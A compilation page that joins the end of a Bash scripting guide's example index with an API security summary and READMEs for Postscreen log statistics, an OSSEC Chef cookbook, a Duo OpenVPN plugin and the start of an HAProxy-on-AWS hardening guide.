16-60. Preparing a bootable SD card for the Raspberry Pi
16-61. Securely deleting a file
16-62. Filename generator
16-63. Converting meters to miles
16-64. Using m4
17-1. Setting a new password
17-2. Setting an erase character
17-3. secret password: Turning off terminal echoing
17-4. Keypress detection
17-5. Checking a remote server for identd
17-6. pidof helps kill a process
17-7. Checking a CD image
17-8. Creating a filesystem in a file
17-9. Adding a new hard drive
17-10. Using umask to hide an output file from prying eyes
17-11. Backlight: changes the brightness of the (laptop) screen backlight
17-12. killall, from /etc/rc.d/init.d
19-1. broadcast: Sends message to everyone logged in
19-2. dummyfile: Creates a 2-line dummy file
19-3. Multi-line message using cat
19-4. Multi-line message, with tabs suppressed
19-5. Here document with replaceable parameters
19-6. Upload a file pair to Sunsite incoming directory
19-7. Parameter substitution turned off
19-8. A script that generates another script
19-9. Here documents and functions
19-10. “Anonymous” Here Document
19-11. Commenting out a block of code
19-12. A self-documenting script
19-13. Prepending a line to a file
19-14. Parsing a mailbox
20-1. Redirecting stdin using exec
20-2. Redirecting stdout using exec
20-3. Redirecting both stdin and stdout in the same script with exec
20-4. Avoiding a subshell
20-5. Redirected while loop
20-6. Alternate form of redirected while loop
20-7. Redirected until loop
20-8. Redirected for loop
20-9. Redirected for loop (both stdin and stdout redirected)
20-10. Redirected if/then test
20-11. Data file for above examples
20-12. Logging events
21-1. Variable scope in a subshell
21-2. List User Profiles
21-3. Running parallel processes in subshells
22-1. Running a script in restricted mode
23-1. Code block redirection without forking
23-2. Redirecting the output of process substitution into a loop.
24-1. Simple functions
24-2. Function Taking Parameters
24-3. Functions and command-line args passed to the script
24-4. Passing an indirect reference to a function
24-5. Dereferencing a parameter passed to a function
24-6. Again, dereferencing a parameter passed to a function
24-7. Maximum of two numbers
24-8. Converting numbers to Roman numerals
24-9. Testing large return values in a function
24-10. Comparing two large integers
24-11. Real name from username
24-12. Local variable visibility
24-13. Demonstration of a simple recursive function
24-14. Another simple demonstration
24-15. Recursion, using a local variable
24-16. The Fibonacci Sequence
24-17. The Towers of Hanoi
25-1. Aliases within a script
25-2. unalias: Setting and unsetting an alias
26-1. Using an and list to test for command-line arguments
26-2. Another command-line arg test using an and list
26-3. Using or lists in combination with an and list
27-1. Simple array usage
27-2. Formatting a poem
27-3. Various array operations
27-4. String operations on arrays
27-5. Loading the contents of a script into an array
27-6. Some special properties of arrays
27-7. Of empty arrays and empty elements
27-8. Initializing arrays
27-9. Copying and concatenating arrays
27-10. More on concatenating arrays
27-11. The Bubble Sort
27-12. Embedded arrays and indirect references
27-13. The Sieve of Eratosthenes
27-14. The Sieve of Eratosthenes, Optimized
27-15. Emulating a push-down stack
27-16. Complex array application: Exploring a weird mathematical series
27-17. Simulating a two-dimensional array, then tilting it
28-1. Indirect Variable References
28-2. Passing an indirect reference to awk
29-1. Using /dev/tcp for troubleshooting
29-2. Playing music
29-3. Finding the process associated with a PID
29-4. On-line connect status
30-1. Print the server environment
30-2. IP addresses
31-1. Hiding the cookie jar
31-2. Setting up a swapfile using /dev/zero
31-3. Creating a ramdisk
32-1. A buggy script
32-2. Missing keyword
32-3. test24: another buggy script
32-4. Testing a condition with an assert
32-5. Trapping at exit
32-6. Cleaning up after Control-C
32-7. A Simple Implementation of a Progress Bar
32-8. Tracing a variable
32-9. Running multiple processes (on an SMP box)
34-1. Numerical and string comparison are not equivalent
34-2. Subshell Pitfalls
34-3. Piping the output of echo to a read
36-1. shell wrapper
36-2. A slightly more complex shell wrapper
36-3. A generic shell wrapper that writes to a logfile
36-4. A shell wrapper around an awk script
36-5. A shell wrapper around another awk script
36-6. Perl embedded in a Bash script
36-7. Bash and Perl scripts combined
36-8. Python embedded in a Bash script
36-9. A script that speaks
36-10. A (useless) script that recursively calls itself
36-11. A (useful) script that recursively calls itself
36-12. Another (useful) script that recursively calls itself
36-13. A “colorized” address database
36-14. Drawing a box
36-15. Echoing colored text
36-16. A “horserace” game
36-17. A Progress Bar
36-18. Return value trickery
36-19. Even more return value trickery
36-20. Passing and returning arrays
36-21. Fun with anagrams
36-22. Widgets invoked from a shell script
36-23. Test Suite
37-1. String expansion
37-2. Indirect variable references – the new way
37-3. Simple database application, using indirect variable referencing
37-4. Using arrays and other miscellaneous trickery to deal four random hands from a deck of cards
37-5. A simple address database
37-6. A somewhat more elaborate address database
37-7. Testing characters
37-8. Reading N characters
37-9. Using a here document to set a variable
37-10. Piping input to a read
37-11. Negative array indices
37-12. Negative parameter in string-extraction construct
A-1. mailformat: Formatting an e-mail message
A-2. rn: A simple-minded file renaming utility
A-3. blank-rename: Renames filenames containing blanks
A-4. encryptedpw: Uploading to an ftp site, using a locally encrypted password
A-5. copy-cd: Copying a data CD
A-6. Collatz series
A-7. days-between: Days between two dates
A-8. Making a dictionary
A-9. Soundex conversion
A-10. Game of Life
A-11. Data file for Game of Life
A-12. behead: Removing mail and news message headers
A-13. password: Generating random 8-character passwords
A-14. fifo: Making daily backups, using named pipes
A-15. Generating prime numbers using the modulo operator
A-16. tree: Displaying a directory tree
A-17. tree2: Alternate directory tree script
A-18. string functions: C-style string functions
A-19. Directory information
A-20. Library of hash functions
A-21. Colorizing text using hash functions
A-22. More on hash functions
A-23. Mounting USB keychain storage devices
A-24. Converting to HTML
A-25. Preserving weblogs
A-26. Protecting literal strings
A-27. Unprotecting literal strings
A-28. Spammer Identification
A-29. Spammer Hunt
A-30. Making wget easier to use
A-31. A podcasting script
A-32. Nightly backup to a firewire HD
A-33. An expanded cd command
A-34. A soundcard setup script
A-35. Locating split paragraphs in a text file
A-36. Insertion sort
A-37. Standard Deviation
A-38. A pad file generator for shareware authors
A-39. A man page editor
A-40. Petals Around the Rose
A-41. Quacky: a Perquackey-type word game
A-42. Nim
A-43. A command-line stopwatch
A-44. An all-purpose shell scripting homework assignment solution
A-45. The Knight’s Tour
A-46. Magic Squares
A-47. Fifteen Puzzle
A-48. The Towers of Hanoi, graphic version
A-49. The Towers of Hanoi, alternate graphic version
A-50. An alternate version of the script
A-51. The version of the example used in the Tab Expansion appendix
A-52. Cycling through all the possible color backgrounds
A-53. Morse Code Practice
A-54. Base64 encoding/decoding
A-55. Inserting text in a file using sed
A-56. The Gronsfeld Cipher
A-57. Bingo Number Generator
A-58. Basics Reviewed
A-59. Testing execution times of various commands
A-60. Associative arrays vs. conventional arrays (execution times)
C-1. Counting Letter Occurrences
J-1. Completion script for
M-1. Sample .bashrc file
M-2. .bash_profile file
N-2. Shell Script Conversion of VIEWDATA.BAT
T-1. A script that generates an ASCII table
T-2. Another ASCII table script
T-3. A third ASCII table script, using awk

Top 10 API Security Considerations

Top 10 API Security Considerations

Just released over at Axway, my new paper “Top 10 API Security Considerations”. Mark O’Neill and I did a webinar on this together, and now the paper is available (free reg required).

I see a lot of people rolling out APIs without a ton of thought given to the security fundamentals. This paper is designed to help you build a model that works to protect your APIs.

Here is a summary of the issues top 10 for API Security, you can read the paper for more examples.

1. Implement Model-Approach-Controller architecture

Information security is usually very focused on dealing with threats and vulnerabilities, and less aligned with architecture. A core principle of architecture is DRY (Don’t Repeat Yourself), which means that systems should be based on design patterns that allow for scalability and manageability.

2. Know and contain your assets

The basic mapping for access control is pretty simple. Subjects (like users and clients) request access to objects (like data, applications and services), and access controls mediate the decision to grant or deny access. However, this simple subject- request-object mapping quickly becomes complex when you factor in management considerations.

3. Design for malice

Most security architectures devote the lion’s share of attention and focus to access- control services that establish the rules of engagement for authenticating and authorizing users. But what about malicious actors that are focused on defeating the system? They often know the exact protocols of the access-control system and are deliberately trying to bypass it. Or, they are trying to exfiltrate data and other valuables from the enterprise.

4. Monitor for flaws — API attacks are happening

“You don’t know who’s swimming naked until the tide goes out.“ — Warren Buffett

Mobile security gets a lot of attention, and rightly so. But look at where the attacks are happening — on the server side. Apple’s recent challenges with iCloud are a great example of this. Apple users endured high-profile breaches even though their data was generated on iPhones, stored on the iCloud server and protected by passwords. The attackers were able to crack those passwords by using a brute-force cryptanalytic attack (continuously guessing password possibilities). According to Apple CEO Tim Cook, “Apple could have done more to make people aware of the dangers of hackers trying to target their accounts or the importance of creating stronger and safer passwords.”

5. Think mobile and beyond

The mobile computing age is upon us — at this writing, there are more mobile users (1.8 billion) than web browser users. Security in the mobile age is at least as much about server-side API security as it is about securing mobile devices.

Delivering security to a wide proliferation of different kinds of clients is a daunting task. There are tens of thousands of variants to consider just in the Android ecosystem alone.

The real challenge is to define where and how to centralize security policy enforcement. If you have 18,000 different devices, you don’t have a controllable system; you have a zoo.

6. Think of sessions, not just APIs

Signing on to an API is one thing, but what about the second, third and nth call? Initial authentication differs from session authentication in that the latter is usually based on session keys. Session keys must be generated in such a way that they are not easily guessed; in practice, this means long and random identifiers. Session identifiers must be protected both in transit (for example, with TLS/SSL) and at rest, but securing a local sandbox for storing session identifiers is a major challenge today.

In addition, the API session is usually a “midstream” session. Consider a mobile application where a session is running on the client device, another is running between the client and the API gateway, and at least one more is running between the API gateway and the back end. Even in this simple example, at least three sessions fire up when the user presses thumb to glass.

7. Simplify user experience

Users don’t care about the details of identity and security protocols; they just want to use the system. Unfortunately, the security industry has historically placed users at the center of the security protocol, and asked them to make intelligent (and technical) risk- based decisions by answering questions like, “Do you trust this certificate?”

8. Simplify the developer experience

Developers are users, too. APIs can unwittingly create vulnerabilities by not arming them with sufficient knowledge. For example, a developer may hit an API too many times and degrade performance. Or a developer may not know why or how to protect API and session keys. These problems can result in Denial of Service, Privilege Escalation and other security issues.

9. Appoint an API curator

This Top 10 list is primarily focused on technology, but even in the age of machines, we humans still play an important role (for at least a few more years, anyway). As much as tech matters, it’s important to get the organizational side right, too — just publishing APIs in a haphazard manner leads to chaos. Organizations need a gatekeeper who can ensure that policies and processes have been followed before exposing the API (and all the data and functionality behind it) to the outside world.

10. Be bi-directional:Notifications, Websockets, SMS

Access-control paradigms are changing. Client/server communications mainly follow Request-Response models, but with mobile, multi-factor authentication and HTML5, we are starting to see wholly new protocols in use.


In honor of Spinal Tap we took this top ten list to eleven, read the paper for the eleventh issue, full descriptions and examples.

Postscreen-Stats – A simple script to parse Postscreen logs

Postscreen Statistics Parser

Simple script to compute some statistics on Postfix/Postscreen Activity Run it against your postfix syslogs

Published under GPL v2

    parses postfix logs to compute statistics on postscreen activity

usage: -f mail.log

  -a|--action=   action filter with operators | and &
                      ex. 'PREGREET&DNSBL|HANGUP' = ((PREGREET and DNSBL) or HANGUP)
                      ex. 'HANGUP&DNSBL|PREGREET&DNSBL' 
                          = ((HANGUP and DNSBL) or (PREGREET and DNSBL)

  -f|--file=     log file to parse (default to /var/log/maillog)

  -g            /!\ slow ! ip geoloc against (default disabled)

  --geofile=    path to a maxmind geolitecity.dat. if specified, with the -g switch
                the script uses the maxmind data instead of (faster)

  -G            when using --geofile, use the pygeoip module instead of the GeoIP module

  -i|--ip=      filters the results on a specific IP

  --mapdest=    path to a destination HTML file that will display a Google Map of the result
                  /!\ Require the geolocation, preferably with --geofile

  --map-min-conn=   When creating a map, only map the IPs that have connected X number of times

  -r|--report=  report mode {short|full|ip|none} (default to short)

  -y|--year=    select the year of the logs (default to current year)

  --rfc3339     to set the timestamp type to "2012-04-13T08:53:00+02:00" instead of the regular syslog format "Oct 23 04:02:17"

example: $ ./ -f maillog.3 -r short -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Julien Vehent (!j) -

Basic usage

Generate a report form a syslog postfix log file. If you are parsing logs from a year that is not the current year, use the -y option to specify the year of the logs.

$ python -f maillog.1 -r short -y 2011
=== unique clients/total postscreen actions ===
2131/11010 CONNECT
463/536 DNSBL
305/503 HANGUP
1884/2258 NOQUEUE 450 deep protocol test reconnection
1/42 NOQUEUE too many connections
1577/1600 PASS NEW
866/8391 PASS OLD
181/239 PREGREET

=== clients statistics ===
4 avg. dnsbl rank
505 blocked clients
2131 clients
840 reconnections
32245.4285714 seconds avg. reco. delay

=== First reconnection delay (graylist) ===
delay| <10s   |>10to30s| >30to1m| >1to5m | >5to30m|>30mto2h| >2hto5h|>5hto12h|>12to24h| >24h   |
count|12      |21      |21      |196     |261     |88      |40      |29      |53      |119     |
   % |1.4     |2.5     |2.5     |23      |31      |10      |4.8     |3.5     |6.3     |14      |

Get the statistics for a specific IP only

$ python -f maillog.1 -r ip -i
Filtering results to match:
    connections count: 2
    first seen on 2011-10-22 09:37:54
    last seen on 2011-10-22 09:38:00
    DNSBL count: 1
    DNSBL ranks: ['6']
    HANGUP count: 2

Geo Localisation of blocked IPs

There are 3 GeoIP modes:

  1. Use online geoip service. This is free but slow and not very accurate
  2. Use Maxmind’s GeoIP database. You can use either the free version of the DB from their website, or get a paid version.

To use, just set the -g option. To use maxmind, set the --geofile to point to your Maxmind DB (ie. --geofile=/path/to/GeoIPCity.dat) By default, geofile use the GeoIP python module, but if you prefer to use pygeoip instead, set the -G option as well.

$ ./ -r short --geofile=../geoip/GeoIPCity.dat -G -f maillog.3 -y 2011


=== Top 20 Countries of Blocked Clients ===
 167 (33.00%) United States
  59 (12.00%) India
  33 ( 6.50%) Russian Federation
  26 ( 5.10%) Indonesia
  23 ( 4.60%) Pakistan
  21 ( 4.20%) Vietnam
  20 ( 4.00%) China
  13 ( 2.60%) Brazil
  11 ( 2.20%) Korea, Republic of
   9 ( 1.80%) Belarus
   8 ( 1.60%) Turkey
   7 ( 1.40%) Iran, Islamic Republic of
   7 ( 1.40%) Ukraine
   6 ( 1.20%) Kazakstan
   6 ( 1.20%) Chile
   5 ( 0.99%) Italy
   5 ( 0.99%) Romania
   4 ( 0.79%) Poland
   4 ( 0.79%) Spain
   3 ( 0.59%) Afghanistan

Geo IP database installation

Using the MaxMind free database at 1. Download the database and extract GeoLiteCity.dat at the location of your choice 2. install the GeoIP maxmind package # aptitude install python-geoip 3. launch postscreen_stats with --geofile="/path/to/geolistcity.dat"

Google Map of the blocked IPs

You can use the --mapdest option to create an HTML file with a map of the blocked IPs.

$ ./ -f maillog.3 -r none -y 2011 --geofile=../geoip/GeoIPCity.dat -G --mapdest=postscreen_report_2012-01-15.html

Google map will be generated at postscreen_report_2012-01-15.html
using MaxMind GeoIP database from ../geoip/GeoIPCity.dat
Creating HTML map at postscreen_report_2012-01-15.html

If you have a lot of IPs to map, you can use --map-min-conn to only map IPs that connected X+ number of times.

./ -f maillog.3 -y 2011 -g --geofile=../geoip/GeoIPCity.dat -G --mapdest=testmap.html --map-min-conn=5

More information can be found on:

AutOssec – Ossec cookbook for Chef, with secure & automated key management


Fully automated Installation and configuration of ossec-servers and ossec-agents Manage the key generation and distribution between a server and multiple agents Clean queues on the server if needed (rid)


Ubuntu 10.04+ (should work with ossec systems if you have the packages)


General Attributes

The attributes below follow the same namespace syntax that OSSEC does. Refer to the official OSSEC Documentation for more information.

Default attributes from the cookbook:

default[:version] = "2.6"
default[:ossec][:syslog_output][:ip] = ""
default[:ossec][:syslog_output][:port] = "514"
default[:ossec][:syslog_output][:min_level] = "5"
default[:ossec][:receiver_port] = "1514"
default[:ossec][:log_alert_level] = "1"
default[:ossec][:email_alert_level] = "7"
default[:ossec][:agents] = {}

Default attributes from the ossec-server role:

:ossec => {
  :email_notification => 'yes',
  :email_to => [
  :email_from => '',
  :smtp_server => 'localhost',
  :white_list => [
  :email_alerts => {
    '' => {
      'level' => '9',
      'group' => 'syscheck',
      'event_location_tag' => 'reputation',
      'event_location_search' => 'roles:*mongodb*',
      'format' => 'sms',
      'rule_id' => '100001',
      'tags' => [
  :server => {
    :service_name => 'ossec-hids-server'
  :syscheck => {
    :frequency => '7200',
    :alert_new_files => 'yes',
    :auto_ignore => 'no',
    :directories => {
      '/bin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/sbin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/usr/bin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/usr/sbin' => {
        'report_changes' => 'no',
        'realtime' => 'yes'
      '/etc' => {
        'report_changes' => 'yes',
        'realtime' => 'yes'
      '/tmp' => {
        'report_changes' => 'yes',
        'realtime' => 'no'
    :ignore => [
  :syslog_files => [

email_alerts is a hash of recipients and servers. Each recipient will receive all of the alert for the listed location (the list is a regex). event_location_tag must contain a valid chef tag. All the nodes listed by that tag will generate a separate email_alerts rule. This is additional to the default list email_to and is used to send alert to specific recipients for a limited number of hosts only.

Local Rules Definitions

Rules are defined in Ruby Hash format and replicate the XML format of regular OSSEC Rules Syntax Each rule has a head, a body, tags and info (the last 2 being optional)

head=   <rule id="12345" level="12" frequency="45" timeframe="60">
body=     <description>Test Rule</description>
body=     <match>Big Error</match>
body=     <hostname>server1</hostname>
tags=     <same_source_ip />
tags=     <same_source_port />
info=     <info type="link"></info>

The section below are parsed by the template. The following items are mandatory:

  • head/level
  • body/description
    :ossec =>
      :rules => {
        "100001" => {
          :head => {
            :level => "7",
            :maxsize => "65536",
            :frequency => "100",
            :timeframe => "3600",
            :ignore => "5",
            :overwrite => "68321"
          :body => {
            :hostname_search => "recipes:mms-agent",
            :description => "Super Security Rule for application XYZ",
            :match => "super dangerous error happened",
            :regex => "^\d+Hello World$",
            :decoded_as => "vsftpd",
            :category => "windows",
            :srcip => "",
            :dstip => "",
            :user => "bob",
            :program_name => "nginx",
            :time => "09:00-18:00",
            :weekday => "monday,tuesday",
            :id => "404",
            :url => "/changepassword.php",
            :if_sid => "100238",
            :if_group => "authentication_success",
            :if_level => "13",
            :if_matched_sid => "12037",
            :if_matched_group => "adduser",
            :if_matched_level => "7",
            :options => "no_email_alert",
            :check_diff => "true",
            :group => "syscheck"
          :tags => [
          :infos => {
            :link => "",
            :text => "the link above contains additional information"


To the exception of hostname_search, all attributes use the same syntax as the ossec rule in XML format does. hostname_search in this cookbook represents a search query that is executed by the server recipe to populate the <hostname> with the proper list of hosts, dynamically pulled from chef. Search criterias can be anything that a chef search can take. Example: recipe:mongodb\:\:replicaset and tags:reputation

Local Decoders Definitions

Decoders are defined in JSON format and replicate the XML format of regular OSSEC Decoder Syntax

:ossec => {
  :decoders => {
    'apache-errorlog' => {
      :program_name => '^httpd|^apache2',
      :prematch => {
        :parser => '^\S+ [\w+\s*\d+ \S+ \d+] [\S+] |^[warn] |^[notice] |^[error]'

    'apache-errorlog-ip-custom' => {
      :parent => 'apache-errorlog',
      :prematch => {
        :offset => 'after_parent',
        :parser => '^[client'
      :regex => {
        :offset => 'after_prematch',
        :parser => '^ (\d+.\d+.\d+.\d+)]'
      :order => 'srcip'
    'web-accesslog-custom' => {
      :parent => 'web-accesslog',
      :type => 'web-log',
      :prematch => {
        :parser => '^\d+.\d+.\d+.\d+ |^::ffff:\d+.\d+.\d+.\d+'
      :regex => {
        :parser => '^\d+.\d+.\d+.\d+ \S+ (\d+.\d+.\d+.\d+) \S+ \S+ \S+ [\S+ \S\d+] "\w+ (\S+) HTTP\S+ (\d+) \S+ "(\S+)"'
      :order => 'srcip, url, id, extra_data'

prematch and regex are hashes that can have an offset value and always have a parser value. See the ossec documentation for more information.

Local Syslog Files

If you want specific log files to be monitored on specific agents, you can use a local_syslog_files block in the agent node attributes. The apply_to parameter of this block is a Chef::Search() that will expand to a list of hosts. If the given agent belong to the list of hosts, it will add the logfile to its local ossec configuration.

  :ossec => {
    local_syslog_files => {
      '/var/log/supervisor/supervisor.log' => {
        'apply_to' => 'supervisor:*',
        'log_format' => 'syslog'


  • recipe[ossec-server] should be a stand alone installation
  • recipe[ossec-agent] should be added (via role[ossec-agent]) to all the nodes of the environment

Example Roles


This role can be used to provision an ossec server:

name 'ossec-server'
description 'OSSEC Server'
  :ossec => {
    :agent => {
      :enable => false
  :ossec => {
    :email_notification => 'yes',
    :email_to => [
    :email_from => 'ossec-server',
    :smtp_server => 'localhost',
    :white_list => [
    :email_alerts => {
      '' => {
        'event_location_tag' => 'project1',
      '' => {
        'event_location_tag' => 'project1',
        'group' => 'developers',
      '' => {
        'event_location_tag' => 'project2',
        'group' => 'developers',
      '' => {
        'event_location_search' => 'tags:project1 OR tags:project2 OR tags:project3',
        'group' => 'developers',
      '' => {
        'event_location_search' => 'roles:application-server AND roles:python-django',
        'group' => 'frontend-group',
    :decoders => {
      1 => {
        :name => 'apache-errorlog',
        :program_name => '^httpd|^apache2',
        :prematch => {
          :parser => '^\S+ [\w+\s*\d+ \S+ \d+] [\S+] |^[warn] |^[notice] |^[error]'

      2 => {
        :name => 'apache-errorlog-ip-custom',
        :parent => 'apache-errorlog',
        :prematch => {
          :offset => 'after_parent',
          :parser => '^[client'
        :regex => {
          :offset => 'after_prematch',
          :parser => '^ (\d+.\d+.\d+.\d+)]'
        :order => 'srcip'
      3 => {
        :name => 'web-accesslog-custom',
        :parent => 'web-accesslog',
        :type => 'web-log',
        :prematch => {
          :parser => '^\d+.\d+.\d+.\d+ |^::ffff:\d+.\d+.\d+.\d+'
        :regex => {
          :parser => '^\d+.\d+.\d+.\d+ \S+ (\d+.\d+.\d+.\d+) \S+ \S+ \S+ [\S+ \S\d+] "\w+ (\S+) HTTP\S+ (\d+) \S+ "(\S+)"'
        :order => 'srcip, url, id, extra_data'
    :rules => {
      1002 => {
        :head => {
          :level => '2',
          :overwrite => 'yes'
        :body => {
          :description => 'Unknown problem somewhere in the system.',
          :match => 'core_dumped|failure|error|Error|attack|bad |illegal |denied|refused|unauthorized|fatal|fail|Segmentation Fault|Corrupted|Traceback|raise',
          :options => 'alert_by_email'
      1003 => {
        :head => {
          :level => '6',
          :maxsize => '16384',
          :overwrite => 'yes'
        :body => {
          :description => 'Non standard syslog message (larger than 16kB).'
      100003 => {
        :head => {
          :level => '10'
        :body => {
          :description => 'Successful sudo during non-business hours 6pm to 8am',
          :if_sid => '5402,5403',
          :time => '10pm - 12am'
      100004 => {
        :head => {
          :level => '10'
        :body => {
          :description => 'Successful sudo during weekend.',
          :if_sid => '5402,5403',
          :weekday => 'weekends'
      100005 => {
        :head => {
          :level => '0'
        :body => {
          :description => 'Silencing sudo errors from accounts allowed to sudo anytime',
          :if_sid => '100004,100005',
          :match => 'nagios'
      100006 => {
        :head => {
          :level => '0'
        :body => {
          :description => 'Silencing ossec agent stop/start during business hours 8am to 6pm',
          :if_sid => '502,503,504',
          :time => '12:00-22:00',
          :weekday => 'monday,tuesday,wednesday,thursday,friday'
      100007 => {
        :head => {
          :level => '8'
        :body => {
          :description => 'Login outside of business hours 6pm to 8am',
          :if_sid => '5501',
          :time => '22:00-12:00'
      100008 => {
        :head => {
          :level => '8'
        :body => {
          :description => 'Login during weekend.',
          :if_sid => '5501',
          :weekday => 'weekends'
      100009 => {
        :head => {
          :level => '0'
        :body => {
          :description => 'Ignore logins alerts for systems accounts',
          :if_sid => '100007,100008',
          :match => 'ubuntu|nagios'


This role can be used to provision an ossec-agent

name "ossec-agent"
description "OSSEC Agent"
  :ossec => {
    :client => {
      :service_name => 'ossec-hids-client'
    :syscheck => {
      :frequency => '7200',
      :alert_new_files => 'yes',
      :auto_ignore => 'no',
      :directories => {
        '/bin' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
         '/boot' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/etc' => {
          'report_changes' => 'yes',
          'realtime' => 'no'
        '/lib/lsb' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/modules' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/plymouth' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/security' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/terminfo' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/ufw' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/lib/xtables' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/media' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/opt' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/root' => {
          'report_changes' => 'yes',
          'realtime' => 'no'
        '/srv' => {
          'report_changes' => 'no',
          'realtime' => 'no'
        '/sbin' => {
          'report_changes' => 'no',
          'realtime' => 'yes'
        '/usr/' => {
          'report_changes' => 'yes',
          'realtime' => 'yes'
        '/tmp' => {
          'report_changes' => 'no',
          'realtime' => 'no'
      :ignore => [
      :local_ignore => {
        '^/opt/graphite/storage/' => {
          'apply_to' => 'roles:graphite-server OR roles:statsd-server',
          'type' => 'sregex'
        '^/usr/lib/elasticsearch' => {
          'apply_to' => 'roles:elastic-search-cluster',
          'type' => 'sregex'
        '^/etc/chef/cache/checksums/' => {
          'apply_to' => 'roles:chef-client',
          'type' => 'sregex'
        '^/srv/rsyslog/' => {
          'apply_to' => 'roles:rsyslog-server',
          'type' => 'sregex'
        '^/etc/djbdns/public-dnscache/supervise/|^/etc/djbdns/tinydns-internal/supervise/|^/etc/djbdns/public-dnscache/log|^/etc/djbdns/tinydns-internal/log|^/etc/djbdns/tinydns-internal/root/data' => {
          'apply_to' => 'roles:djbdns-server',
          'type' => 'sregex'
    :syslog_files => [
    :local_syslog_files => {
      '/var/log/supervisor/supervisor.log' => {
        'apply_to' => 'supervisor:*',
        'log_format' => 'syslog'
      '/var/log/rabbitmq/rabbit1.log' => {
        'apply_to' => 'recipes:rabbitmq',
        'log_format' => 'multi-line:3'
      '/var/log/nginx/access.log' => {
        'apply_to' => 'nginx:*',
        'log_format' => 'syslog'
      '/var/log/nginx/error.log' => {
        'apply_to' => 'nginx:*',
        'log_format' => 'syslog'
      '/var/log/nagios3/nagios.log' => {
        'apply_to' => 'roles:nagios-server',
        'log_format' => 'syslog'
      '/var/log/nagios3/apache_access.log' => {
        'apply_to' => 'roles:nagios-server',
        'log_format' => 'syslog'
      '/var/log/nagios3/apache_error.log' => {
        'apply_to' => 'roles:nagios-server',
        'log_format' => 'syslog'

More information can be found on:

Mozilla’s take on duo_openvpn


Our own take at duo_openvpn support. Not very happy with the provided duo_openvpn support, we rewrote it to use duo_client_python which is much nicer.

Git submodules

In order to checkout all the modules necessary for this to build, run

git clone --recursive
# Or, if already checked out:
git submodule update --init --recursive


  • Simple. Sort of. The LDAP features are a little more complex – if you don’t use that, it’s fairly simple.
  • Auth caching per login+ip address.
  • Fail open (optional).
  • OTP and Push (use push as password for push, passcode:123456 as password for OTP, where 123456 is your OTP).
  • CEF support.
  • MozDef support.
  • Optional username hack, in case you use emails as certificate CN but only the first part of the email as login.
  • Supports logging with LDAP with or instead-of Duo.
  • Deferred call.


C plugin

Call it from openvpn configuration with:

plugin /usr/lib/openvpn/plugins/ /usr/lib/openvpn/plugins/

This allow making a deferred call for authentication while using a script instead of blocking OpenVPN. This is needed as otherwise Duo will block OpenVPN while waiting for a push reply or OTP input.

Python script

Look at and rename/copy it to duo_openvpn.conf (or /etc/duo_openvpn.conf). Here are some examples & help:

TRY_LDAP_ONLY_AUTH_FIRST=False: Try to auth LDAP first, if succeeds, bypass DuoSec.

:LDAP_URL=”ldap://”: Needed for any LDAP operation, else leave empty. :LDAP_BIND_DN=’mail=%s,o=com,dc=mozilla’: The bind dn for the user auth. %s is replaced by the username. :LDAP_BASE_DN=’dc=mozilla’: The base dn to find the user to auth in.

LDAP control values are mainly used to filter on a group that has DuoSecurity enabled. If you’re in that group, you get DuoSec, else, you get LDAP auth. Basically, we’re looking up the user’s uid from his email (as we’re passed an email as common_name). If the uid == the email, that’s fine too. Then, we lookup for an attribute in LDAP, and we check that the attribute’s value’s value (yeah..) == the uid. Looks like this: User:,o=com,dc=mozilla => uid = hi Attributes: {‘posix_sysadmins’: {‘memberUid’: “user1”, “hi”, “user2, … }}

Bind to that user for attribute checks.
LDAP_CONTROL_PASSWORD=””: The password for the above user.
LDAP_CONTROL_BASE_DN=”ou=groups,dc=mozilla”: The base DN for the above attribute search.
LDAP_DUOSEC_ATTR_VALUE=”cn=posix_sysadmins”: Will look for that attribute, when checking for DuoSecurity users.
LDAP_DUOSEC_ATTR=”memberUid”: Will look for that value in the attribute.

Misc scripts

The /scripts directory contains additional goodies.


If you use reneg-sec 0 as setting so that OpenVPN does not renegociate (or renegociates very rarely should you use another setting than 0 but that is still very high), you might still want to automatically disconnect users that you have disabled in LDAP.

Run this in a crontab periodically, it’ll pool for the users and kill em.

Recommended openvpn server settings:

management /var/run/openvpn-udp-stage.socket unix
management-client-group vpnmgmt


  • use mozlibldap for the duo script

More information can be found on:

Documentation on building a HTTPS stack in AWS with HAProxy

Guidelines for HAProxy termination in AWS

Document status

NOT READY $Revision: $ @ 2015-04-17 09:04 PDT
Author Julien Vehent Review CloudOps

Table of contents

  • 1   Summary & Scope
  • 2   Architecture
  • 3   PROXY protocol between ELB and HAProxy
    • 3.1   ELB Configuration
    • 3.2   HAProxy frontend
    • 3.3   SSL/TLS Configuration
    • 3.4   Healthchecks between ELB and HAProxy
  • 4   ELB Logging
  • 5   HAProxy Logging
    • 5.1   Unique request ID
    • 5.2   Capturing headers and cookies
    • 5.3   Logging in a separate frontend
  • 6   Rate limiting & DDoS protection
    • 6.1   Automated rate limiting
    • 6.2   Querying tables state in real time
    • 6.3   Blacklists & Whitelists
    • 6.4   Protect against slow clients (Slowloris attack)
  • 7   URL filtering with ACLs
    • 7.1   Filtering URL parameters on GET requests
    • 7.2   Filtering payloads on POST requests
    • 7.3   Marking instead of blocking
  • 8   HAProxy management
    • 8.1   Enabling the stat socket
    • 8.2   Collecting statistics
    • 8.3   Analyzing errors
    • 8.4   Parsing performance metrics from the logs
    • 8.5   Soft reload
  • 9   Full HAProxy configuration
  • 10   Building process
    • 10.1   Static build
    • 10.2   Dynamic build
    • 10.3   RPM build

1   Summary & Scope

This document explains how HAProxy and Elastic Load Balancer can be used in Amazon Web Services to provide performant and secure termination of traffic to an API service. The goal is to provide the following features:

  • DDoS Protection: we use HAProxy to mitigate low to medium DDoS attacks, with sane limits and custom blacklist.
